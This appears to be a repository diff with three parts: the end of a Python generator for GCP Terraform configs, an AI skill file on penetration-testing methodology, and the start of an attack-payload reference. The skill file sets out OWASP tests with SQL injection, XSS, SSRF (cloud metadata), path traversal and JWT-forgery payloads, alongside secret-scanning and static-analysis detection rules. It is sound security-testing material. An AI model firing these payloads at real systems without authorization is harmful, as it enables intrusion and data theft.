"secretmanager.googleapis.com",
"artifactregistry.googleapis.com",
"monitoring.googleapis.com",
])
project = var.project_id
service = each.value
}}
# Service Account for Cloud Run
resource "google_service_account" "cloud_run" {{
account_id = "${{var.app_name}}-run-sa"
display_name = "${{var.app_name}} Cloud Run Service Account"
}}
resource "google_project_iam_member" "firestore_user" {{
project = var.project_id
role = "roles/datastore.user"
member = "serviceAccount:${{google_service_account.cloud_run.email}}"
}}
resource "google_project_iam_member" "secret_accessor" {{
project = var.project_id
role = "roles/secretmanager.secretAccessor"
member = "serviceAccount:${{google_service_account.cloud_run.email}}"
}}
# Firestore Database
resource "google_firestore_database" "default" {{
project = var.project_id
name = "(default)"
location_id = var.region
type = "FIRESTORE_NATIVE"
depends_on = [google_project_service.apis["firestore.googleapis.com"]]
}}
# Cloud Run Service
resource "google_cloud_run_v2_service" "api" {{
name = "${{var.environment}}-${{var.app_name}}-api"
location = var.region
template {{
service_account = google_service_account.cloud_run.email
containers {{
image = "${{var.region}}-docker.pkg.dev/${{var.project_id}}/${{var.app_name}}/${{var.app_name}}:latest"
resources {{
limits = {{
cpu = "1000m"
memory = "512Mi"
}}
}}
env {{
name = "PROJECT_ID"
value = var.project_id
}}
env {{
name = "ENVIRONMENT"
value = var.environment
}}
}}
scaling {{
min_instance_count = 0
max_instance_count = 10
}}
}}
depends_on = [google_project_service.apis["run.googleapis.com"]]
labels = {{
environment = var.environment
app = var.app_name
}}
}}
# Allow unauthenticated access (public API)
resource "google_cloud_run_v2_service_iam_member" "public" {{
project = var.project_id
location = var.region
name = google_cloud_run_v2_service.api.name
role = "roles/run.invoker"
member = "allUsers"
}}
# Cloud Storage bucket for static assets
resource "google_storage_bucket" "static" {{
name = "${{var.project_id}}-${{var.app_name}}-static"
location = var.region
uniform_bucket_level_access = true
website {{
main_page_suffix = "index.html"
not_found_page = "404.html"
}}
lifecycle_rule {{
condition {{
age = 30
}}
action {{
type = "SetStorageClass"
storage_class = "NEARLINE"
}}
}}
labels = {{
environment = var.environment
app = var.app_name
}}
}}
# Outputs
output "cloud_run_url" {{
description = "Cloud Run service URL"
value = google_cloud_run_v2_service.api.uri
}}
output "static_bucket" {{
description = "Static assets bucket name"
value = google_storage_bucket.static.name
}}
output "service_account" {{
description = "Cloud Run service account email"
value = google_service_account.cloud_run.email
}}
"""
def _terraform_gke_microservices(self) -> str:
"""Generate Terraform for GKE microservices pattern."""
return f"""terraform {{
required_version = ">= 1.0"
required_providers {{
google = {{
source = "hashicorp/google"
version = "~> 5.0"
}}
}}
}}
provider "google" {{
project = var.project_id
region = var.region
}}
variable "project_id" {{
description = "GCP project ID"
type = string
}}
variable "region" {{
description = "GCP region"
type = string
default = "{self.region}"
}}
variable "environment" {{
description = "Environment name"
type = string
default = "dev"
}}
variable "app_name" {{
description = "Application name"
type = string
default = "{self.app_name}"
}}
# Enable required APIs
resource "google_project_service" "apis" {{
for_each = toset([
"container.googleapis.com",
"sqladmin.googleapis.com",
"redis.googleapis.com",
"servicenetworking.googleapis.com",
"secretmanager.googleapis.com",
])
project = var.project_id
service = each.value
}}
# VPC Network
resource "google_compute_network" "main" {{
name = "${{var.app_name}}-vpc"
auto_create_subnetworks = false
}}
resource "google_compute_subnetwork" "main" {{
name = "${{var.app_name}}-subnet"
ip_cidr_range = "10.0.0.0/20"
region = var.region
network = google_compute_network.main.id
secondary_ip_range {{
range_name = "pods"
ip_cidr_range = "10.4.0.0/14"
}}
secondary_ip_range {{
range_name = "services"
ip_cidr_range = "10.8.0.0/20"
}}
}}
# GKE Autopilot Cluster
resource "google_container_cluster" "main" {{
name = "${{var.environment}}-${{var.app_name}}-cluster"
location = var.region
enable_autopilot = true
network = google_compute_network.main.name
subnetwork = google_compute_subnetwork.main.name
ip_allocation_policy {{
cluster_secondary_range_name = "pods"
services_secondary_range_name = "services"
}}
release_channel {{
channel = "REGULAR"
}}
depends_on = [google_project_service.apis["container.googleapis.com"]]
}}
# Private Services Access for Cloud SQL
resource "google_compute_global_address" "private_ip" {{
name = "private-ip-range"
purpose = "VPC_PEERING"
address_type = "INTERNAL"
prefix_length = 16
network = google_compute_network.main.id
}}
resource "google_service_networking_connection" "private_vpc" {{
network = google_compute_network.main.id
service = "servicenetworking.googleapis.com"
reserved_peering_ranges = [google_compute_global_address.private_ip.name]
}}
# Cloud SQL PostgreSQL
resource "google_sql_database_instance" "main" {{
name = "${{var.environment}}-${{var.app_name}}-db"
database_version = "POSTGRES_15"
region = var.region
settings {{
tier = "db-custom-2-8192"
availability_type = "REGIONAL"
backup_configuration {{
enabled = true
start_time = "02:00"
point_in_time_recovery_enabled = true
}}
ip_configuration {{
ipv4_enabled = false
private_network = google_compute_network.main.id
}}
disk_autoresize = true
}}
depends_on = [google_service_networking_connection.private_vpc]
}}
resource "google_sql_database" "app" {{
name = var.app_name
instance = google_sql_database_instance.main.name
}}
# Memorystore Redis
resource "google_redis_instance" "cache" {{
name = "${{var.environment}}-${{var.app_name}}-cache"
tier = "BASIC"
memory_size_gb = 1
region = var.region
redis_version = "REDIS_7_0"
authorized_network = google_compute_network.main.id
depends_on = [google_project_service.apis["redis.googleapis.com"]]
labels = {{
environment = var.environment
app = var.app_name
}}
}}
# Outputs
output "cluster_name" {{
description = "GKE cluster name"
value = google_container_cluster.main.name
}}
output "cloud_sql_connection" {{
description = "Cloud SQL connection name"
value = google_sql_database_instance.main.connection_name
}}
output "redis_host" {{
description = "Memorystore Redis host"
value = google_redis_instance.cache.host
}}
"""
def main():
    """CLI entry point: parse arguments, build a DeploymentManager, and emit
    the requested deployment artifacts as JSON, files, or stdout text."""
    parser = argparse.ArgumentParser(
        description='GCP Deployment Manager - Generates gcloud CLI scripts and Terraform configurations'
    )
    parser.add_argument('--app-name', '-a', type=str, required=True,
                        help='Application name')
    parser.add_argument('--pattern', '-p', type=str,
                        choices=['serverless_web', 'gke_microservices', 'data_pipeline'],
                        default='serverless_web',
                        help='Architecture pattern (default: serverless_web)')
    parser.add_argument('--region', '-r', type=str, default='us-central1',
                        help='GCP region (default: us-central1)')
    parser.add_argument('--project-id', type=str, default='my-project',
                        help='GCP project ID (default: my-project)')
    parser.add_argument('--format', '-f', type=str,
                        choices=['gcloud', 'terraform', 'both'],
                        default='both',
                        help='Output format (default: both)')
    parser.add_argument('--output', '-o', type=str,
                        help='Output directory for generated files')
    parser.add_argument('--json', action='store_true',
                        help='Output as JSON format')
    args = parser.parse_args()

    deployer = DeploymentManager(args.app_name, {
        'pattern': args.pattern,
        'region': args.region,
        'project_id': args.project_id,
    })
    # Which artifact families the caller asked for.
    want_gcloud = args.format in ('gcloud', 'both')
    want_terraform = args.format in ('terraform', 'both')

    if args.json:
        # Machine-readable: bundle requested artifacts into one JSON object.
        payload = {}
        if want_gcloud:
            payload['gcloud_script'] = deployer.generate_gcloud_script()
        if want_terraform:
            payload['terraform_config'] = deployer.generate_terraform_configuration()
        print(json.dumps(payload, indent=2))
    elif args.output:
        # Write artifacts into the requested directory (created if missing).
        import os
        os.makedirs(args.output, exist_ok=True)
        if want_gcloud:
            script_path = os.path.join(args.output, 'deploy.sh')
            with open(script_path, 'w') as fh:
                fh.write(deployer.generate_gcloud_script())
            os.chmod(script_path, 0o755)  # make the shell script executable
            print(f"gcloud script written to {script_path}")
        if want_terraform:
            config_path = os.path.join(args.output, 'main.tf')
            with open(config_path, 'w') as fh:
                fh.write(deployer.generate_terraform_configuration())
            print(f"Terraform config written to {config_path}")
    else:
        # Default: dump the requested artifacts to stdout with headers.
        if want_gcloud:
            print("# ===== gcloud CLI Script =====")
            print(deployer.generate_gcloud_script())
        if want_terraform:
            print("# ===== Terraform Configuration =====")
            print(deployer.generate_terraform_configuration())
# Script entry point: run the CLI only when executed directly, not on import.
if __name__ == '__main__':
    main()

View File

@@ -0,0 +1,850 @@
---
name: "security-pen-testing"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
---
# Security Penetration Testing
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
---
## Table of Contents
- [Overview](#overview)
- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)
---
## Overview
### What This Skill Does
This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
### Distinction from Other Security Skills
| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
### Prerequisites
All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
---
## OWASP Top 10 Systematic Audit
Use the vulnerability scanner tool for automated checklist generation:
```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full
# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```
### A01:2021 — Broken Access Control
**Test Procedures:**
1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
2. Test vertical escalation: access admin endpoints with regular user tokens
3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
5. Modify JWT claims (`role`, `is_admin`) and replay tokens
**What to Look For:**
- Missing authorization checks on API endpoints
- Predictable resource IDs (sequential integers vs. UUIDs)
- Client-side only access controls (hidden UI elements without server checks)
- CORS misconfigurations allowing arbitrary origins
### A02:2021 — Cryptographic Failures
**Test Procedures:**
1. Check TLS version — reject anything below TLS 1.2
2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
3. Look for sensitive data in URLs (tokens in query params get logged)
4. Check for hardcoded encryption keys in source code
5. Test for weak random number generation (Math.random() for tokens)
**What to Look For:**
- MD5/SHA1 used for password hashing
- Secrets in environment variables without encryption at rest
- Missing `Strict-Transport-Security` header
- Self-signed certificates in production
### A03:2021 — Injection
**Test Procedures:**
1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
3. Command injection: test inputs with `; whoami` and backtick substitution
4. LDAP injection: test with `*)(uid=*))(|(uid=*`
5. Template injection: test with `{{7*7}}` and `${7*7}`
**What to Look For:**
- String concatenation in SQL queries
- User input passed to `eval()`, `exec()`, `os.system()`
- Unparameterized ORM queries
- Template engines rendering user input without sandboxing
### A04:2021 — Insecure Design
**Test Procedures:**
1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
2. Check rate limiting on sensitive operations (login, password reset, OTP)
3. Test multi-step flows for state manipulation (skip payment step)
4. Verify security questions aren't guessable
**What to Look For:**
- Missing rate limits on authentication endpoints
- Business logic that trusts client-side calculations
- Lack of account lockout after failed attempts
- Missing CAPTCHA on public-facing forms
### A05:2021 — Security Misconfiguration
**Test Procedures:**
1. Check for default credentials on admin panels
2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
3. Check error handling — stack traces should never leak to users
4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
5. Check directory listing is disabled
**What to Look For:**
- Debug mode enabled in production
- Default admin:admin credentials
- Verbose error messages with stack traces
- Missing security headers
### A06:2021 — Vulnerable and Outdated Components
**Test Procedures:**
1. Run dependency audit against known CVE databases
2. Check for end-of-life frameworks and libraries
3. Verify transitive dependency versions
4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)
```bash
# Audit a package manifest
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```
### A07:2021 — Identification and Authentication Failures
**Test Procedures:**
1. Test brute force protection on login endpoints
2. Check password policy enforcement (minimum length, complexity)
3. Verify session invalidation on logout and password change
4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
5. Check multi-factor authentication bypass paths
**What to Look For:**
- Sessions that persist after logout
- Missing `HttpOnly` and `Secure` flags on session cookies
- Password reset tokens that don't expire
- Username enumeration via different error messages
### A08:2021 — Software and Data Integrity Failures
**Test Procedures:**
1. Check for unsigned updates or deployment artifacts
2. Verify CI/CD pipeline integrity (signed commits, protected branches)
3. Test deserialization endpoints with crafted payloads
4. Check for SRI (Subresource Integrity) on CDN-loaded scripts
**What to Look For:**
- Unsafe deserialization of user input (pickle, Java serialization)
- Missing integrity checks on downloaded artifacts
- CI/CD pipelines running untrusted code
- CDN scripts without SRI hashes
### A09:2021 — Security Logging and Monitoring Failures
**Test Procedures:**
1. Verify authentication events are logged (success and failure)
2. Check that logs don't contain sensitive data (passwords, tokens, PII)
3. Test alerting thresholds (do 50 failed logins trigger an alert?)
4. Verify log integrity — can an attacker tamper with logs?
**What to Look For:**
- Missing audit trail for admin actions
- Passwords or tokens appearing in logs
- No alerting on suspicious patterns
- Logs stored without integrity protection
### A10:2021 — Server-Side Request Forgery (SSRF)
**Test Procedures:**
1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
2. Check for open redirect chains that reach internal services
3. Test with DNS rebinding payloads
4. Verify allowlist validation on outbound requests
**What to Look For:**
- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
- Missing allowlist on outbound HTTP requests
- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
- PDF generators or screenshot services that fetch arbitrary URLs
---
## Static Analysis
### CodeQL Custom Rules
Write custom CodeQL queries for project-specific vulnerability patterns:
```ql
/**
* Detect SQL injection via string concatenation
*/
import python
import semmle.python.dataflow.new.DataFlow
from Call call, StringFormatting fmt
where
call.getFunc().getName() = "execute" and
fmt = call.getArg(0) and
exists(DataFlow::Node source |
source.asExpr() instanceof Name and
DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
)
select call, "Potential SQL injection: user input flows into execute()"
```
### Semgrep Custom Rules
Create project-specific Semgrep rules:
```yaml
rules:
- id: hardcoded-jwt-secret
pattern: |
jwt.encode($PAYLOAD, "...", ...)
message: "JWT signed with hardcoded secret"
severity: ERROR
languages: [python]
- id: unsafe-yaml-load
pattern: yaml.load($DATA)
fix: yaml.safe_load($DATA)
message: "Use yaml.safe_load() to prevent arbitrary code execution"
severity: WARNING
languages: [python]
- id: express-no-helmet
pattern: |
const app = express();
...
app.listen(...)
pattern-not: |
const app = express();
...
app.use(helmet(...));
...
app.listen(...)
message: "Express app missing helmet middleware for security headers"
severity: WARNING
languages: [javascript, typescript]
```
### ESLint Security Plugins
Recommended configuration:
```json
{
"plugins": ["security", "no-unsanitized"],
"extends": ["plugin:security/recommended"],
"rules": {
"security/detect-object-injection": "error",
"security/detect-non-literal-regexp": "warn",
"security/detect-unsafe-regex": "error",
"security/detect-buffer-noassert": "error",
"security/detect-eval-with-expression": "error",
"no-unsanitized/method": "error",
"no-unsanitized/property": "error"
}
}
```
---
## Dependency Vulnerability Scanning
### Ecosystem-Specific Commands
```bash
# Node.js
npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'
# Python
pip-audit --format json --desc
safety check --json
# Go
govulncheck ./...
# Ruby
bundle audit check --update
```
### CVE Triage Workflow
1. **Collect**: Run ecosystem audit tools, aggregate findings
2. **Deduplicate**: Group by CVE ID across direct and transitive deps
3. **Score**: Use CVSS base score + environmental adjustments
4. **Prioritize**: Critical + exploitable + reachable = fix immediately
5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
6. **Verify**: Rerun audit to confirm fix, update lock files
```bash
# Use the dependency auditor for automated triage
python scripts/dependency_auditor.py --file package.json --severity critical --json
```
### Known Vulnerable Patterns
| Package | Vulnerable Versions | CVE | Impact |
|---------|-------------------|-----|--------|
| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
| lodash | < 4.17.21 | CVE-2021-23337 | Command injection via template |
| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
| pillow | < 9.3.0 | CVE-2022-45199 | DoS via crafted image |
| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
---
## Secret Scanning
### TruffleHog Patterns
```bash
# Scan git history for secrets
trufflehog git file://. --only-verified --json
# Scan filesystem (no git history)
trufflehog filesystem . --json
```
### Gitleaks Configuration
```toml
# .gitleaks.toml
title = "Custom Gitleaks Config"
[[rules]]
id = "aws-access-key"
description = "AWS Access Key ID"
regex = '''AKIA[0-9A-Z]{16}'''
tags = ["aws", "credentials"]
[[rules]]
id = "generic-api-key"
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
tags = ["api", "key"]
[[rules]]
id = "private-key"
description = "Private Key Header"
regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
tags = ["private-key"]
[allowlist]
paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
```
### Pre-commit Hook Integration
```yaml
# .pre-commit-config.yaml
repos:
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
- repo: https://github.com/trufflesecurity/trufflehog
rev: v3.63.0
hooks:
- id: trufflehog
args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
```
### CI Integration (GitHub Actions)
```yaml
name: Secret Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
```
---
## API Security Testing
### Authentication Bypass
**JWT Manipulation:**
1. Decode token at jwt.io — inspect claims without verification
2. Change `alg` to `none` and remove signature: `eyJ...payload.`
3. Change `alg` from RS256 to HS256 and sign with the public key
4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
5. Test key confusion: HMAC signed with RSA public key bytes
**Session Fixation:**
1. Obtain a session token before authentication
2. Authenticate — check if the session ID changes
3. If the same session ID persists, the app is vulnerable to session fixation
### Authorization Flaws
**IDOR (Insecure Direct Object Reference):**
```
GET /api/users/123/profile → 200 (your profile)
GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
GET /api/users/124/profile → 403 (expected result when properly protected)
```
Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
**BOLA (Broken Object Level Authorization):**
Same as IDOR but specifically in REST APIs. Test every CRUD operation:
- Can user A read user B's resource?
- Can user A update user B's resource?
- Can user A delete user B's resource?
**BFLA (Broken Function Level Authorization):**
```
# Regular user tries admin endpoints
POST /api/admin/users → Should be 403
DELETE /api/admin/users/123 → Should be 403
PUT /api/settings/global → Should be 403
```
### Rate Limiting Validation
Test rate limits on critical endpoints:
```bash
# Rapid-fire login attempts
for i in $(seq 1 100); do
curl -s -o /dev/null -w "%{http_code}" \
-X POST https://target.com/api/login \
-d '{"email":"test@test.com","password":"wrong"}';
done
# Expect: 429 after threshold (typically 5-10 attempts)
```
### Mass Assignment Detection
```bash
# Try adding admin fields to a regular update request
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin", # mass assignment attempt
"is_verified": true, # mass assignment attempt
"subscription": "enterprise" # mass assignment attempt
}
```
### GraphQL-Specific Testing
**Introspection Query:**
```graphql
{
__schema {
types { name fields { name type { name } } }
}
}
```
Introspection should be **disabled in production**.
**Query Depth Attack:**
```graphql
{
user(id: 1) {
friends {
friends {
friends {
friends { # Keep nesting until server crashes
name
}
}
}
}
}
}
```
**Batching Attack:**
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
]
```
Batch mutations can bypass rate limiting if counted as a single request.
---
## Web Vulnerability Testing
### XSS (Cross-Site Scripting)
**Reflected XSS Test Payloads** (non-destructive):
```
<script>alert(document.domain)</script>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain)
<svg onload=alert(document.domain)>
'-alert(document.domain)-'
</script><script>alert(document.domain)</script>
```
**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.
**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
### CSRF Token Validation
1. Capture a legitimate request with CSRF token
2. Replay the request without the token — should fail (403)
3. Replay with a token from a different session — should fail
4. Check if token changes per request or is static per session
5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax`
### SQL Injection
**Detection Payloads** (safe, non-destructive):
```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1 OR 1=1
' UNION SELECT NULL--
' AND SLEEP(5)-- (time-based blind)
' AND 1=1-- (boolean-based blind)
```
**Union-Based Enumeration** (authorized testing only):
```sql
' UNION SELECT 1,2,3-- -- Find column count
' UNION SELECT table_name,2,3 FROM information_schema.tables--
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
```
**Time-Based Blind:**
```sql
' AND IF(1=1, SLEEP(5), 0)-- -- MySQL
' AND pg_sleep(5)-- -- PostgreSQL
' WAITFOR DELAY '0:0:5'-- -- MSSQL
```
### SSRF Detection
**Payloads for SSRF testing:**
```
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/ (AWS metadata)
http://metadata.google.internal/ (GCP metadata)
http://169.254.169.254/metadata/instance (Azure metadata)
http://[::1] (IPv6 localhost)
http://0x7f000001 (hex encoding)
http://2130706433 (decimal encoding)
```
### Path Traversal
```
GET /api/files?name=../../../etc/passwd
GET /api/files?name=....//....//....//etc/passwd
GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd (double encoding)
```
---
## Infrastructure Security
### Misconfigured Cloud Storage
**S3 Bucket Checks:**
```bash
# Check for public read access
aws s3 ls s3://target-bucket --no-sign-request
# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket
# Check ACL
aws s3api get-bucket-acl --bucket target-bucket
```
**Common Bucket Name Patterns:**
```
{company}-backup, {company}-dev, {company}-staging
{company}-assets, {company}-uploads, {company}-logs
```
### HTTP Security Headers
Required headers and expected values:
| Header | Expected Value |
|--------|---------------|
| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
| `X-Content-Type-Options` | `nosniff` |
| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
| `Referrer-Policy` | `strict-origin-when-cross-origin` |
| `Permissions-Policy` | Restrict camera, microphone, geolocation |
| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |
### TLS Configuration
```bash
# Check TLS version and cipher suites
nmap --script ssl-enum-ciphers -p 443 target.com
# Quick check with testssl.sh
./testssl.sh target.com
# Check certificate expiry
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
```
**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.
### Open Port Scanning
```bash
# Quick top-1000 ports
nmap -sV target.com
# Full port scan
nmap -p- -sV target.com
# Common dangerous open ports
# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
```
---
## Pen Test Report Generation
Generate professional reports from structured findings:
```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```
### Findings JSON Format
```json
[
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"]
}
]
```
### Report Structure
1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists
---
## Responsible Disclosure Workflow
Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.
### Timeline
| Day | Action |
|-----|--------|
| 0 | Discovery — document finding with evidence |
| 1 | Report to vendor via security contact or bug bounty program |
| 7 | Follow up if no acknowledgment received |
| 30 | Request status update and remediation timeline |
| 60 | Second follow-up — offer technical assistance |
| 90 | Public disclosure (with or without fix, per industry standard) |
### Key Principles
1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
4. **Document everything** — timestamps, screenshots, request/response pairs
5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix
---
## Workflows
### Workflow 1: Quick Security Check (15 Minutes)
For pre-merge reviews or quick health checks:
```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick
# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high
# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in Secret Scanning section)
# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```
**Decision**: If any critical or high findings, block the merge.
### Workflow 2: Full Penetration Test (Multi-Day Assessment)
**Day 1 — Reconnaissance:**
1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run automated OWASP checklist (full scope)
3. Run dependency audit across all manifests
4. Run secret scan on full git history
**Day 2 — Manual Testing:**
1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
**Day 3 — Infrastructure and Reporting:**
1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate pen test report
```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```
### Workflow 3: CI/CD Security Gate
Automated security checks that run on every pull request:
```yaml
# .github/workflows/security-gate.yml
name: Security Gate
on: [pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
# Secret scanning
- name: Scan for secrets
uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
# Dependency audit
- name: Audit dependencies
run: |
npm audit --audit-level=high
pip-audit --desc
# SAST
- name: Static analysis
uses: returntocorp/semgrep-action@v1
with:
config: >-
p/security-audit
p/secrets
p/owasp-top-ten
# Security headers check (staging only)
- name: Check security headers
if: github.base_ref == 'staging'
run: |
curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
```
**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
---
## Anti-Patterns
1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| [senior-secops](../senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](../senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](../../engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](../code-reviewer/SKILL.md) | Code review practices — includes security review checklist |

View File

@@ -0,0 +1,549 @@
# Attack Patterns Reference
Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only.
---
## XSS Test Payloads
### Reflected XSS
These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers.
**Basic payloads:**
```
<script>alert(document.domain)</script>
"><script>alert(document.domain)</script>
'><script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
<body onload=alert(document.domain)>
